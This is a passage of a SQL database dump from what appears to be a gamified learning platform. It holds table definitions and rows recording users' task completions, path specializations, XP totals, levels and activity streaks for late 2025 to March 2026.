(378, 297, 9, '2026-03-14 16:34:43', NULL, 0.00, NULL, '2026-03-14 16:34:43', '2026-03-14 16:34:43', NULL),
(379, 297, 1, '2026-03-14 16:40:04', NULL, 0.00, NULL, '2026-03-14 16:40:04', '2026-03-14 16:40:04', NULL),
(380, 298, 9, '2026-03-14 18:38:44', NULL, 0.00, NULL, '2026-03-14 18:38:44', '2026-03-14 18:38:44', NULL),
(381, 299, 9, '2026-03-14 21:38:03', NULL, 0.00, NULL, '2026-03-14 21:38:03', '2026-03-14 21:38:03', NULL),
(382, 283, 2, '2026-03-14 22:00:48', NULL, 0.00, NULL, '2026-03-14 22:00:48', '2026-03-14 22:00:48', NULL),
(383, 283, 3, '2026-03-14 22:01:53', NULL, 0.00, NULL, '2026-03-14 22:01:53', '2026-03-14 22:01:53', NULL),
(384, 283, 1, '2026-03-14 22:04:39', NULL, 0.00, NULL, '2026-03-14 22:04:39', '2026-03-14 22:04:39', NULL),
(385, 298, 3, '2026-03-14 22:54:39', NULL, 0.00, NULL, '2026-03-14 22:54:39', '2026-03-14 22:54:39', NULL),
(386, 283, 6, '2026-03-14 23:11:26', NULL, 0.00, NULL, '2026-03-14 23:11:26', '2026-03-14 23:11:26', NULL),
(387, 300, 9, '2026-03-14 23:27:23', NULL, 0.00, NULL, '2026-03-14 23:27:23', '2026-03-14 23:27:23', NULL),
(388, 301, 9, '2026-03-15 07:46:34', NULL, 0.00, NULL, '2026-03-15 07:46:34', '2026-03-15 07:46:34', NULL),
(389, 302, 9, '2026-03-15 10:47:31', NULL, 0.00, NULL, '2026-03-15 10:47:31', '2026-03-15 10:47:31', NULL),
(390, 303, 9, '2026-03-15 17:12:43', NULL, 0.00, NULL, '2026-03-15 17:12:43', '2026-03-15 17:12:43', NULL),
(391, 303, 3, '2026-03-15 17:15:47', NULL, 1.15, NULL, '2026-03-15 17:15:47', '2026-03-15 17:37:43', NULL),
(392, 304, 9, '2026-03-15 17:28:08', NULL, 0.00, NULL, '2026-03-15 17:28:08', '2026-03-15 17:28:08', NULL),
(393, 305, 9, '2026-03-15 17:51:16', NULL, 0.00, NULL, '2026-03-15 17:51:16', '2026-03-15 17:51:16', NULL),
(394, 306, 9, '2026-03-15 18:10:21', NULL, 0.00, NULL, '2026-03-15 18:10:21', '2026-03-15 18:10:21', NULL),
(395, 307, 9, '2026-03-15 18:38:43', NULL, 0.00, NULL, '2026-03-15 18:38:43', '2026-03-15 18:38:43', NULL),
(396, 28, 6, '2026-03-15 21:17:16', NULL, 0.00, NULL, '2026-03-15 21:17:16', '2026-03-15 21:17:16', NULL),
(397, 283, 4, '2026-03-15 22:35:15', NULL, 0.00, NULL, '2026-03-15 22:35:15', '2026-03-15 22:35:15', NULL),
(398, 283, 12, '2026-03-15 22:35:47', NULL, 0.00, NULL, '2026-03-15 22:35:47', '2026-03-15 22:35:47', NULL),
(399, 308, 9, '2026-03-16 01:42:40', NULL, 0.00, NULL, '2026-03-16 01:42:40', '2026-03-16 01:42:40', NULL);

-- --------------------------------------------------------

--
-- Table structure for table `user_path_specialization`
--

CREATE TABLE `user_path_specialization` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `path_code` varchar(20) NOT NULL,
  `level` int(11) DEFAULT 1,
  `xp` int(11) DEFAULT 0,
  `alerts_completed` int(11) DEFAULT 0,
  `missions_completed` int(11) DEFAULT 0,
  `average_score` decimal(5,2) DEFAULT 0.00,
  `last_activity_date` datetime DEFAULT NULL,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp()
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;

-- --------------------------------------------------------

--
-- Table structure for table `user_task_progress`
--

CREATE TABLE `user_task_progress` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `task_id` int(11) NOT NULL,
  `completed` tinyint(1) DEFAULT 0,
  `completed_at` timestamp NULL DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `user_task_progress`
--

INSERT INTO `user_task_progress` (`id`, `user_id`, `task_id`, `completed`, `completed_at`, `created_at`, `updated_at`) VALUES
(1, 34, 1, 1, '2025-12-26 01:00:05', '2025-12-26 01:00:05', '2025-12-26 01:00:05'),
(2, 34, 5, 1, '2025-12-26 01:02:04', '2025-12-26 01:02:04', '2025-12-26 01:02:04'),
(3, 34, 2, 1, '2025-12-26 01:04:03', '2025-12-26 01:04:03', '2025-12-26 01:04:03'),
(4, 34, 3, 1, '2025-12-26 02:00:03', '2025-12-26 02:00:03', '2025-12-26 02:00:03'),
(5, 1, 1, 1, '2025-12-26 15:29:20', '2025-12-26 15:29:20', '2025-12-26 15:29:20'),
(6, 34, 349, 1, '2025-12-26 18:31:49', '2025-12-26 18:31:49', '2025-12-26 18:31:49'),
(7, 34, 350, 1, '2025-12-26 19:11:06', '2025-12-26 19:11:06', '2025-12-26 19:11:06'),
(8, 34, 6, 1, '2025-12-26 20:10:11', '2025-12-26 20:10:11', '2025-12-26 20:10:11'),
(9, 34, 7, 1, '2025-12-26 20:14:32', '2025-12-26 20:14:32', '2025-12-26 20:14:32'),
(10, 34, 8, 1, '2025-12-26 20:20:31', '2025-12-26 20:20:31', '2025-12-26 20:20:31'),
(11, 34, 9, 1, '2025-12-26 20:22:23', '2025-12-26 20:22:23', '2025-12-26 20:22:23'),
(12, 34, 10, 1, '2025-12-26 20:26:35', '2025-12-26 20:26:35', '2025-12-26 20:26:35'),
(13, 34, 11, 1, '2025-12-26 20:28:07', '2025-12-26 20:28:07', '2025-12-26 20:28:07'),
(14, 34, 12, 1, '2025-12-26 20:29:15', '2025-12-26 20:29:15', '2025-12-26 20:29:15'),
(15, 34, 32, 1, '2025-12-26 20:44:41', '2025-12-26 20:44:41', '2025-12-26 20:44:41'),
(16, 34, 33, 1, '2025-12-26 20:46:41', '2025-12-26 20:46:41', '2025-12-26 20:46:41'),
(17, 34, 54, 1, '2025-12-26 21:14:00', '2025-12-26 21:14:00', '2025-12-26 21:14:00'),
(18, 1, 771, 1, '2025-12-29 13:53:27', '2025-12-29 13:53:27', '2025-12-29 13:53:27'),
(19, 42, 1, 1, '2025-12-30 13:40:31', '2025-12-30 13:40:31', '2025-12-30 13:40:31'),
(20, 42, 2, 1, '2025-12-30 13:41:34', '2025-12-30 13:41:34', '2025-12-30 13:41:34'),
(21, 42, 3, 1, '2025-12-30 13:42:10', '2025-12-30 13:42:10', '2025-12-30 13:42:10'),
(22, 42, 4, 1, '2025-12-30 13:42:41', '2025-12-30 13:42:41', '2025-12-30 13:42:41'),
(23, 42, 5, 1, '2025-12-30 13:43:10', '2025-12-30 13:43:10', '2025-12-30 13:43:10'),
(24, 42, 22, 1, '2025-12-30 13:45:54', '2025-12-30 13:45:54', '2025-12-30 13:45:54'),
(25, 42, 23, 1, '2025-12-30 13:46:37', '2025-12-30 13:46:37', '2025-12-30 13:46:37'),
(26, 42, 24, 1, '2025-12-30 13:47:42', '2025-12-30 13:47:42', '2025-12-30 13:47:42'),
(27, 42, 25, 1, '2025-12-30 13:50:19', '2025-12-30 13:50:19', '2025-12-30 13:50:19'),
(28, 42, 26, 1, '2025-12-30 13:51:39', '2025-12-30 13:51:39', '2025-12-30 13:51:39'),
(29, 42, 27, 1, '2025-12-30 13:52:49', '2025-12-30 13:52:49', '2025-12-30 13:52:49'),
(30, 42, 28, 1, '2025-12-30 13:53:51', '2025-12-30 13:53:51', '2025-12-30 13:53:51'),
(31, 65, 1, 1, '2026-01-06 16:28:31', '2026-01-06 16:28:31', '2026-01-06 16:28:31'),
(32, 74, 1, 1, '2026-01-12 06:32:13', '2026-01-12 06:32:13', '2026-01-12 06:32:13'),
(33, 74, 54, 1, '2026-01-12 06:52:12', '2026-01-12 06:52:12', '2026-01-12 06:52:12'),
(34, 74, 2, 1, '2026-01-17 08:38:34', '2026-01-17 08:38:34', '2026-01-17 08:38:34'),
(35, 74, 3, 1, '2026-01-17 08:39:31', '2026-01-17 08:39:31', '2026-01-17 08:39:31'),
(36, 74, 4, 1, '2026-01-17 08:40:24', '2026-01-17 08:40:24', '2026-01-17 08:40:24'),
(37, 74, 5, 1, '2026-01-17 08:41:02', '2026-01-17 08:41:02', '2026-01-17 08:41:02'),
(38, 107, 2, 1, '2026-02-02 15:00:17', '2026-02-02 15:00:17', '2026-02-02 15:00:17'),
(39, 107, 3, 1, '2026-02-02 15:12:49', '2026-02-02 15:12:49', '2026-02-02 15:12:49'),
(40, 107, 4, 1, '2026-02-02 15:17:44', '2026-02-02 15:17:44', '2026-02-02 15:17:44'),
(41, 107, 5, 1, '2026-02-02 15:21:56', '2026-02-02 15:21:56', '2026-02-02 15:21:56'),
(42, 107, 1, 1, '2026-02-02 15:27:10', '2026-02-02 15:27:10', '2026-02-02 15:27:10'),
(43, 34, 359, 1, '2026-02-05 19:28:01', '2026-02-05 19:28:01', '2026-02-05 19:28:01'),
(44, 183, 54, 1, '2026-02-20 04:23:32', '2026-02-20 04:23:32', '2026-02-20 04:23:32'),
(45, 214, 54, 1, '2026-02-27 06:31:25', '2026-02-27 06:31:25', '2026-02-27 06:31:25'),
(46, 214, 55, 1, '2026-02-27 06:36:08', '2026-02-27 06:36:08', '2026-02-27 06:36:08'),
(47, 232, 221, 1, '2026-03-03 06:05:08', '2026-03-03 06:05:08', '2026-03-03 06:05:08'),
(48, 232, 222, 1, '2026-03-04 03:50:31', '2026-03-04 03:50:31', '2026-03-04 03:50:31'),
(49, 232, 223, 1, '2026-03-04 03:56:30', '2026-03-04 03:56:30', '2026-03-04 03:56:30'),
(50, 232, 224, 1, '2026-03-04 04:43:37', '2026-03-04 04:43:37', '2026-03-04 04:43:37'),
(51, 232, 225, 1, '2026-03-04 04:44:54', '2026-03-04 04:44:54', '2026-03-04 04:44:54'),
(52, 232, 226, 1, '2026-03-04 04:52:03', '2026-03-04 04:52:03', '2026-03-04 04:52:03'),
(53, 232, 227, 1, '2026-03-04 16:17:55', '2026-03-04 16:17:55', '2026-03-04 16:17:55'),
(54, 232, 228, 1, '2026-03-04 16:19:09', '2026-03-04 16:19:09', '2026-03-04 16:19:09'),
(55, 237, 1, 1, '2026-03-04 16:20:30', '2026-03-04 16:20:30', '2026-03-04 16:20:30'),
(56, 232, 231, 1, '2026-03-05 04:02:10', '2026-03-05 04:02:10', '2026-03-05 04:02:10'),
(57, 225, 1, 1, '2026-03-05 04:46:03', '2026-03-05 04:46:03', '2026-03-05 04:46:03'),
(58, 225, 2, 1, '2026-03-05 04:49:22', '2026-03-05 04:49:22', '2026-03-05 04:49:22'),
(59, 225, 3, 1, '2026-03-05 04:53:13', '2026-03-05 04:53:13', '2026-03-05 04:53:13'),
(60, 225, 4, 1, '2026-03-05 04:55:06', '2026-03-05 04:55:06', '2026-03-05 04:55:06'),
(61, 225, 5, 1, '2026-03-05 04:56:38', '2026-03-05 04:56:38', '2026-03-05 04:56:38'),
(62, 232, 232, 1, '2026-03-05 05:26:14', '2026-03-05 05:26:14', '2026-03-05 05:26:14'),
(63, 232, 233, 1, '2026-03-05 05:30:25', '2026-03-05 05:30:25', '2026-03-05 05:30:25'),
(64, 260, 1, 1, '2026-03-07 11:50:16', '2026-03-07 11:50:16', '2026-03-07 11:50:16'),
(65, 232, 234, 1, '2026-03-07 15:09:30', '2026-03-07 15:09:30', '2026-03-07 15:09:30'),
(66, 232, 235, 1, '2026-03-08 09:13:57', '2026-03-08 09:13:57', '2026-03-08 09:13:57'),
(67, 260, 2, 1, '2026-03-08 09:14:32', '2026-03-08 09:14:32', '2026-03-08 09:14:32'),
(68, 232, 236, 1, '2026-03-08 09:15:35', '2026-03-08 09:15:35', '2026-03-08 09:15:35'),
(69, 260, 3, 1, '2026-03-08 09:33:23', '2026-03-08 09:33:23', '2026-03-08 09:33:23'),
(70, 260, 4, 1, '2026-03-08 09:46:06', '2026-03-08 09:46:06', '2026-03-08 09:46:06'),
(71, 232, 241, 1, '2026-03-08 09:47:57', '2026-03-08 09:47:57', '2026-03-08 09:47:57'),
(72, 232, 242, 1, '2026-03-08 09:50:04', '2026-03-08 09:50:04', '2026-03-08 09:50:04'),
(73, 260, 5, 1, '2026-03-08 09:56:56', '2026-03-08 09:56:56', '2026-03-08 09:56:56'),
(74, 232, 243, 1, '2026-03-08 10:16:50', '2026-03-08 10:16:50', '2026-03-08 10:16:50'),
(75, 232, 244, 1, '2026-03-08 10:18:46', '2026-03-08 10:18:46', '2026-03-08 10:18:46'),
(76, 232, 245, 1, '2026-03-08 10:21:33', '2026-03-08 10:21:33', '2026-03-08 10:21:33'),
(77, 232, 246, 1, '2026-03-08 10:35:49', '2026-03-08 10:35:49', '2026-03-08 10:35:49'),
(78, 232, 247, 1, '2026-03-08 10:37:56', '2026-03-08 10:37:56', '2026-03-08 10:37:56'),
(79, 232, 251, 1, '2026-03-08 11:26:58', '2026-03-08 11:26:58', '2026-03-08 11:26:58'),
(80, 232, 252, 1, '2026-03-08 14:19:55', '2026-03-08 14:19:55', '2026-03-08 14:19:55'),
(81, 232, 253, 1, '2026-03-08 14:25:49', '2026-03-08 14:25:49', '2026-03-08 14:25:49'),
(82, 232, 254, 1, '2026-03-08 14:33:28', '2026-03-08 14:33:28', '2026-03-08 14:33:28'),
(83, 232, 255, 1, '2026-03-08 14:46:03', '2026-03-08 14:46:03', '2026-03-08 14:46:03'),
(84, 232, 256, 1, '2026-03-08 14:47:32', '2026-03-08 14:47:32', '2026-03-08 14:47:32'),
(85, 232, 261, 1, '2026-03-09 13:56:58', '2026-03-09 13:56:58', '2026-03-09 13:56:58'),
(86, 232, 262, 1, '2026-03-09 13:58:29', '2026-03-09 13:58:29', '2026-03-09 13:58:29'),
(87, 232, 263, 1, '2026-03-09 14:00:37', '2026-03-09 14:00:37', '2026-03-09 14:00:37'),
(88, 232, 264, 1, '2026-03-09 14:03:33', '2026-03-09 14:03:33', '2026-03-09 14:03:33'),
(89, 232, 265, 1, '2026-03-09 14:04:53', '2026-03-09 14:04:53', '2026-03-09 14:04:53'),
(90, 232, 266, 1, '2026-03-09 14:12:51', '2026-03-09 14:12:51', '2026-03-09 14:12:51'),
(91, 232, 267, 1, '2026-03-09 14:13:37', '2026-03-09 14:13:37', '2026-03-09 14:13:37'),
(92, 232, 272, 1, '2026-03-09 17:37:40', '2026-03-09 17:37:40', '2026-03-09 17:37:40'),
(93, 232, 273, 1, '2026-03-09 17:54:56', '2026-03-09 17:54:56', '2026-03-09 17:54:56'),
(94, 232, 274, 1, '2026-03-09 18:04:05', '2026-03-09 18:04:05', '2026-03-09 18:04:05'),
(95, 232, 275, 1, '2026-03-09 18:05:08', '2026-03-09 18:05:08', '2026-03-09 18:05:08'),
(96, 232, 276, 1, '2026-03-09 18:06:01', '2026-03-09 18:06:01', '2026-03-09 18:06:01'),
(97, 232, 277, 1, '2026-03-09 18:06:55', '2026-03-09 18:06:55', '2026-03-09 18:06:55'),
(98, 232, 278, 1, '2026-03-09 18:07:53', '2026-03-09 18:07:53', '2026-03-09 18:07:53'),
(99, 232, 271, 1, '2026-03-09 18:08:51', '2026-03-09 18:08:51', '2026-03-09 18:08:51'),
(100, 232, 281, 1, '2026-03-09 18:09:50', '2026-03-09 18:09:50', '2026-03-09 18:09:50'),
(101, 232, 282, 1, '2026-03-09 18:10:33', '2026-03-09 18:10:33', '2026-03-09 18:10:33'),
(102, 232, 283, 1, '2026-03-09 18:11:19', '2026-03-09 18:11:19', '2026-03-09 18:11:19'),
(103, 232, 284, 1, '2026-03-09 18:12:22', '2026-03-09 18:12:22', '2026-03-09 18:12:22'),
(104, 232, 285, 1, '2026-03-09 18:13:08', '2026-03-09 18:13:08', '2026-03-09 18:13:08'),
(105, 232, 286, 1, '2026-03-09 18:13:51', '2026-03-09 18:13:51', '2026-03-09 18:13:51'),
(106, 232, 287, 1, '2026-03-09 18:14:24', '2026-03-09 18:14:24', '2026-03-09 18:14:24'),
(107, 232, 296, 1, '2026-03-10 16:36:41', '2026-03-10 16:36:41', '2026-03-10 16:36:41'),
(108, 232, 297, 1, '2026-03-10 16:37:30', '2026-03-10 16:37:30', '2026-03-10 16:37:30'),
(109, 232, 291, 1, '2026-03-10 16:42:22', '2026-03-10 16:42:22', '2026-03-10 16:42:22'),
(110, 232, 292, 1, '2026-03-10 16:46:21', '2026-03-10 16:46:21', '2026-03-10 16:46:21'),
(111, 232, 293, 1, '2026-03-10 16:56:35', '2026-03-10 16:56:35', '2026-03-10 16:56:35'),
(112, 232, 294, 1, '2026-03-10 16:58:05', '2026-03-10 16:58:05', '2026-03-10 16:58:05'),
(113, 232, 295, 1, '2026-03-10 17:05:44', '2026-03-10 17:05:44', '2026-03-10 17:05:44'),
(114, 232, 301, 1, '2026-03-10 17:32:44', '2026-03-10 17:32:44', '2026-03-10 17:32:44'),
(115, 232, 302, 1, '2026-03-10 17:37:09', '2026-03-10 17:37:09', '2026-03-10 17:37:09'),
(116, 232, 303, 1, '2026-03-10 17:40:12', '2026-03-10 17:40:12', '2026-03-10 17:40:12'),
(117, 232, 304, 1, '2026-03-10 17:48:57', '2026-03-10 17:48:57', '2026-03-10 17:48:57'),
(118, 232, 305, 1, '2026-03-10 17:51:34', '2026-03-10 17:51:34', '2026-03-10 17:51:34'),
(119, 232, 306, 1, '2026-03-10 17:54:28', '2026-03-10 17:54:28', '2026-03-10 17:54:28'),
(120, 232, 307, 1, '2026-03-10 17:54:51', '2026-03-10 17:54:51', '2026-03-10 17:54:51'),
(121, 225, 32, 1, '2026-03-10 22:49:31', '2026-03-10 22:49:31', '2026-03-10 22:49:31'),
(122, 225, 33, 1, '2026-03-10 22:54:36', '2026-03-10 22:54:36', '2026-03-10 22:54:36'),
(123, 225, 34, 1, '2026-03-11 04:06:24', '2026-03-11 04:06:24', '2026-03-11 04:06:24'),
(124, 260, 22, 1, '2026-03-11 04:52:11', '2026-03-11 04:52:11', '2026-03-11 04:52:11'),
(125, 260, 23, 1, '2026-03-11 04:57:08', '2026-03-11 04:57:08', '2026-03-11 04:57:08'),
(126, 232, 311, 1, '2026-03-11 16:47:51', '2026-03-11 16:47:51', '2026-03-11 16:47:51'),
(127, 232, 312, 1, '2026-03-11 16:54:38', '2026-03-11 16:54:38', '2026-03-11 16:54:38'),
(128, 232, 313, 1, '2026-03-11 17:07:42', '2026-03-11 17:07:42', '2026-03-11 17:07:42'),
(129, 232, 314, 1, '2026-03-11 17:10:35', '2026-03-11 17:10:35', '2026-03-11 17:10:35'),
(130, 232, 315, 1, '2026-03-11 17:11:59', '2026-03-11 17:11:59', '2026-03-11 17:11:59'),
(131, 232, 316, 1, '2026-03-11 17:15:46', '2026-03-11 17:15:46', '2026-03-11 17:15:46'),
(132, 225, 35, 1, '2026-03-12 03:20:06', '2026-03-12 03:20:06', '2026-03-12 03:20:06'),
(133, 225, 36, 1, '2026-03-12 03:22:44', '2026-03-12 03:22:44', '2026-03-12 03:22:44'),
(134, 225, 37, 1, '2026-03-12 04:05:07', '2026-03-12 04:05:07', '2026-03-12 04:05:07'),
(135, 225, 38, 1, '2026-03-12 05:09:40', '2026-03-12 05:09:40', '2026-03-12 05:09:40'),
(136, 225, 39, 1, '2026-03-12 05:13:48', '2026-03-12 05:13:48', '2026-03-12 05:13:48'),
(137, 225, 22, 1, '2026-03-12 05:21:05', '2026-03-12 05:21:05', '2026-03-12 05:21:05'),
(138, 225, 23, 1, '2026-03-12 05:22:49', '2026-03-12 05:22:49', '2026-03-12 05:22:49'),
(139, 225, 24, 1, '2026-03-12 05:24:54', '2026-03-12 05:24:54', '2026-03-12 05:24:54'),
(140, 225, 25, 1, '2026-03-12 05:28:37', '2026-03-12 05:28:37', '2026-03-12 05:28:37'),
(141, 225, 26, 1, '2026-03-12 05:30:18', '2026-03-12 05:30:18', '2026-03-12 05:30:18'),
(142, 225, 27, 1, '2026-03-12 05:31:38', '2026-03-12 05:31:38', '2026-03-12 05:31:38'),
(143, 225, 28, 1, '2026-03-12 05:33:03', '2026-03-12 05:33:03', '2026-03-12 05:33:03'),
(144, 225, 30, 1, '2026-03-12 05:34:29', '2026-03-12 05:34:29', '2026-03-12 05:34:29'),
(145, 225, 31, 1, '2026-03-12 05:36:52', '2026-03-12 05:36:52', '2026-03-12 05:36:52'),
(146, 42, 350, 1, '2026-03-12 11:48:00', '2026-03-12 11:48:00', '2026-03-12 11:48:00'),
(147, 283, 350, 1, '2026-03-12 12:08:06', '2026-03-12 12:08:06', '2026-03-12 12:08:06'),
(148, 283, 351, 1, '2026-03-12 12:26:01', '2026-03-12 12:26:01', '2026-03-12 12:26:01'),
(149, 283, 352, 1, '2026-03-12 12:36:02', '2026-03-12 12:36:02', '2026-03-12 12:36:02'),
(150, 283, 353, 1, '2026-03-12 12:52:02', '2026-03-12 12:52:02', '2026-03-12 12:52:02'),
(151, 283, 359, 1, '2026-03-12 13:11:01', '2026-03-12 13:11:01', '2026-03-12 13:11:01'),
(152, 283, 360, 1, '2026-03-12 13:24:00', '2026-03-12 13:24:00', '2026-03-12 13:24:00'),
(153, 283, 349, 1, '2026-03-12 21:48:00', '2026-03-12 21:48:00', '2026-03-12 21:48:00'),
(154, 225, 40, 1, '2026-03-13 02:27:17', '2026-03-13 02:27:17', '2026-03-13 02:27:17'),
(155, 225, 41, 1, '2026-03-13 02:33:06', '2026-03-13 02:33:06', '2026-03-13 02:33:06'),
(156, 225, 42, 1, '2026-03-13 02:35:33', '2026-03-13 02:35:33', '2026-03-13 02:35:33'),
(157, 225, 43, 1, '2026-03-13 02:36:38', '2026-03-13 02:36:38', '2026-03-13 02:36:38'),
(158, 225, 44, 1, '2026-03-13 02:38:02', '2026-03-13 02:38:02', '2026-03-13 02:38:02'),
(159, 225, 45, 1, '2026-03-13 02:39:30', '2026-03-13 02:39:30', '2026-03-13 02:39:30'),
(160, 225, 46, 1, '2026-03-13 02:41:07', '2026-03-13 02:41:07', '2026-03-13 02:41:07'),
(161, 225, 47, 1, '2026-03-13 02:43:55', '2026-03-13 02:43:55', '2026-03-13 02:43:55'),
(162, 225, 349, 1, '2026-03-13 03:00:01', '2026-03-13 03:00:01', '2026-03-13 03:00:01'),
(163, 225, 350, 1, '2026-03-13 03:04:01', '2026-03-13 03:04:01', '2026-03-13 03:04:01'),
(164, 225, 351, 1, '2026-03-13 03:31:03', '2026-03-13 03:31:03', '2026-03-13 03:31:03'),
(165, 232, 324, 1, '2026-03-13 16:06:33', '2026-03-13 16:06:33', '2026-03-13 16:06:33'),
(166, 232, 325, 1, '2026-03-13 16:09:15', '2026-03-13 16:09:15', '2026-03-13 16:09:15'),
(167, 232, 326, 1, '2026-03-13 16:10:25', '2026-03-13 16:10:25', '2026-03-13 16:10:25'),
(168, 232, 321, 1, '2026-03-13 16:15:55', '2026-03-13 16:15:55', '2026-03-13 16:15:55'),
(169, 232, 322, 1, '2026-03-13 16:17:25', '2026-03-13 16:17:25', '2026-03-13 16:17:25'),
(170, 232, 323, 1, '2026-03-13 16:18:41', '2026-03-13 16:18:41', '2026-03-13 16:18:41'),
(171, 232, 331, 1, '2026-03-14 04:50:03', '2026-03-14 04:50:03', '2026-03-14 04:50:03'),
(172, 232, 332, 1, '2026-03-14 04:52:42', '2026-03-14 04:52:42', '2026-03-14 04:52:42'),
(173, 232, 333, 1, '2026-03-14 04:56:28', '2026-03-14 04:56:28', '2026-03-14 04:56:28'),
(174, 232, 334, 1, '2026-03-14 04:57:45', '2026-03-14 04:57:45', '2026-03-14 04:57:45'),
(175, 232, 335, 1, '2026-03-14 04:58:49', '2026-03-14 04:58:49', '2026-03-14 04:58:49'),
(176, 232, 336, 1, '2026-03-14 04:59:17', '2026-03-14 04:59:17', '2026-03-14 04:59:17'),
(177, 232, 341, 1, '2026-03-14 05:01:01', '2026-03-14 05:01:01', '2026-03-14 05:01:01'),
(178, 232, 342, 1, '2026-03-14 05:02:11', '2026-03-14 05:02:11', '2026-03-14 05:02:11'),
(179, 232, 343, 1, '2026-03-14 05:03:17', '2026-03-14 05:03:17', '2026-03-14 05:03:17'),
(180, 232, 344, 1, '2026-03-14 05:03:58', '2026-03-14 05:03:58', '2026-03-14 05:03:58'),
(181, 232, 345, 1, '2026-03-14 05:04:34', '2026-03-14 05:04:34', '2026-03-14 05:04:34'),
(182, 232, 346, 1, '2026-03-14 05:05:01', '2026-03-14 05:05:01', '2026-03-14 05:05:01'),
(183, 232, 364, 1, '2026-03-14 17:18:39', '2026-03-14 17:18:39', '2026-03-14 17:18:39'),
(184, 225, 352, 1, '2026-03-15 10:41:01', '2026-03-15 10:41:01', '2026-03-15 10:41:01'),
(185, 225, 353, 1, '2026-03-15 10:51:00', '2026-03-15 10:51:00', '2026-03-15 10:51:00'),
(186, 260, 24, 1, '2026-03-15 13:50:58', '2026-03-15 13:50:58', '2026-03-15 13:50:58'),
(187, 260, 25, 1, '2026-03-15 14:01:10', '2026-03-15 14:01:10', '2026-03-15 14:01:10'),
(188, 260, 26, 1, '2026-03-15 14:12:56', '2026-03-15 14:12:56', '2026-03-15 14:12:56'),
(189, 232, 365, 1, '2026-03-15 16:00:00', '2026-03-15 16:00:00', '2026-03-15 16:00:00'),
(190, 260, 27, 1, '2026-03-15 16:04:37', '2026-03-15 16:04:37', '2026-03-15 16:04:37'),
(191, 260, 28, 1, '2026-03-15 16:15:06', '2026-03-15 16:15:06', '2026-03-15 16:15:06'),
(192, 260, 30, 1, '2026-03-15 16:29:36', '2026-03-15 16:29:36', '2026-03-15 16:29:36'),
(193, 260, 31, 1, '2026-03-15 16:59:18', '2026-03-15 16:59:18', '2026-03-15 16:59:18'),
(194, 232, 361, 1, '2026-03-15 17:12:38', '2026-03-15 17:12:38', '2026-03-15 17:12:38'),
(195, 303, 221, 1, '2026-03-15 17:37:43', '2026-03-15 17:37:43', '2026-03-15 17:37:43'),
(196, 232, 362, 1, '2026-03-15 18:05:01', '2026-03-15 18:05:01', '2026-03-15 18:05:01'),
(197, 260, 40, 1, '2026-03-15 18:10:50', '2026-03-15 18:10:50', '2026-03-15 18:10:50'),
(198, 232, 363, 1, '2026-03-15 18:14:02', '2026-03-15 18:14:02', '2026-03-15 18:14:02'),
(199, 232, 366, 1, '2026-03-15 18:20:01', '2026-03-15 18:20:01', '2026-03-15 18:20:01'),
(200, 260, 41, 1, '2026-03-15 18:24:14', '2026-03-15 18:24:14', '2026-03-15 18:24:14'),
(201, 260, 42, 1, '2026-03-15 18:57:22', '2026-03-15 18:57:22', '2026-03-15 18:57:22'),
(202, 260, 43, 1, '2026-03-15 19:44:15', '2026-03-15 19:44:15', '2026-03-15 19:44:15'),
(203, 260, 44, 1, '2026-03-15 20:23:12', '2026-03-15 20:23:12', '2026-03-15 20:23:12'),
(204, 260, 45, 1, '2026-03-15 20:44:14', '2026-03-15 20:44:14', '2026-03-15 20:44:14'),
(205, 260, 46, 1, '2026-03-15 21:16:41', '2026-03-15 21:16:41', '2026-03-15 21:16:41'),
(206, 260, 47, 1, '2026-03-15 21:27:59', '2026-03-15 21:27:59', '2026-03-15 21:27:59'),
(207, 225, 359, 1, '2026-03-16 02:59:00', '2026-03-16 02:59:00', '2026-03-16 02:59:00'),
(208, 225, 360, 1, '2026-03-16 03:07:01', '2026-03-16 03:07:01', '2026-03-16 03:07:01'),
(209, 225, 367, 1, '2026-03-16 03:19:04', '2026-03-16 03:19:04', '2026-03-16 03:19:04');

-- --------------------------------------------------------

--
-- Table structure for table `user_xp`
--

CREATE TABLE `user_xp` (
  `user_id` int(11) NOT NULL,
  `total_xp` int(11) DEFAULT 0,
  `monthly_xp` int(11) DEFAULT 0,
  `current_level` int(11) DEFAULT 1,
  `xp_to_next_level` int(11) DEFAULT 100,
  `streak_days` int(11) DEFAULT 0,
  `last_activity_date` date DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `user_xp`
--

INSERT INTO `user_xp` (`user_id`, `total_xp`, `monthly_xp`, `current_level`, `xp_to_next_level`, `streak_days`, `last_activity_date`, `created_at`, `updated_at`) VALUES
(1, 3435, 3165, 35, 3500, 42, '2026-03-16', '2025-12-26 10:00:34', '2026-03-15 21:05:01'),
(28, 50, 50, 1, 100, 1, '2026-03-16', '2026-03-15 21:09:15', '2026-03-15 21:09:15'),
(34, 6712, 5402, 68, 6800, 11, '2026-03-16', '2025-12-26 00:52:27', '2026-03-16 02:48:47'),
(40, 0, 0, 1, 100, 0, NULL, '2025-12-27 04:17:43', '2025-12-27 04:17:43'),
(42, 1780, 1350, 18, 1800, 2, '2026-03-13', '2025-12-27 11:51:16', '2026-03-13 10:01:53'),
(44, 0, 0, 1, 100, 0, NULL, '2025-12-27 21:00:47', '2025-12-27 21:00:47'),
(45, 50, 50, 1, 100, 1, '2026-02-17', '2025-12-28 17:13:20', '2026-02-17 02:54:20'),
(49, 0, 0, 1, 100, 0, NULL, '2026-01-04 22:28:27', '2026-01-04 22:28:27'),
(50, 0, 0, 1, 100, 0, NULL, '2025-12-28 22:58:56', '2025-12-28 22:58:56'),
(51, 0, 0, 1, 100, 0, NULL, '2025-12-28 21:56:13', '2025-12-28 21:56:13'),
(52, 150, 150, 2, 200, 1, '2026-02-02', '2025-12-29 08:08:59', '2026-02-02 12:19:05'),
